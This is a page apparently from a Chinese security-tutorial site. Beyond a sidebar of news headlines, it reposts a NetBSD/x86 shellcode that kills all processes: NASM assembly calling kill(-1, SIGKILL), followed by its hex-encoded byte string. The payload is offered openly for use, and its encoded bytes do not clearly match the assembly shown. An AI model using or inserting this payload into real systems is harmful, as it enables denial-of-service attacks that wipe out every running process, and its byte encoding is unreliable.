当前位置: 首页 > 图文教程 > 网络安全 > 杀毒防毒 > 杀掉进程的shellcode(netbsd/x86)

杀毒防毒
好工具帮你规避网络风险
金山毒霸提醒小心“最牛作文”木马
加一道安全防护网:Windows2008系统的高级防火墙
电脑安全的保护神:Eset Nod32的设置技巧
电脑中的木马必须清除
对“小耗子”木马的回顾
如何抵挡病毒木马大军的汹汹来势
研究Linux下Firewall的配置
体验Windows7系统防火墙功能的改善
瑞星卡卡找不到组件怎么办
FireFox3.5浏览器被指存在50多个漏洞
MPEG视频漏洞 微软全球紧急通告
微软修复视频漏洞 Office补丁尚未发布
Windows XP系统中鲜为人知的快捷键漏洞
四大全新亮点助推卡巴斯基2010新版
Conficker蠕虫病毒变异体再现江湖
卡巴斯基2010中添加信任程序的方法
防止杀毒软件被病毒禁用的批处理
面对“Trinoo攻击”,应该如何抵御
金山毒霸·极速版正式发布

杀毒防毒 中的 杀掉进程的shellcode(netbsd/x86)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-20   浏览: 57 ::
收藏到网摘: n/a

  /*

  netbsd/x86 kill all processes shellcode

  author Teo Manojlovic

  contact [email protected]

  this shellcode is using syscall number 37 or 0x25

  37 STD { int sys_kill(int pid, int signum); }

  here is assembler code using intel syntaxe and NASM

  --------------begin-----------

  section .note.netbsd.ident

  dd0x07,0x04,0x01

  db"NetBSD",0x00,0x00

  dd200000000

  section .data

  section .text

  global _start

  _start:

  xor eax, eax

  push 0x09

  mov eax, -1

  push eax

  xor eax,eax

  mov al, 37

  push eax

  int 0x80

  -------------------------end------------

  if we dissasemble this code wi will get shellcode

  "\x66\x31\xc0\x68\x09\x00\x66\xb8\xff\xff\xff\xff\x66\x50\x66\x31\xc0\xb0\x25\x66\x50\xcd\x80"

  */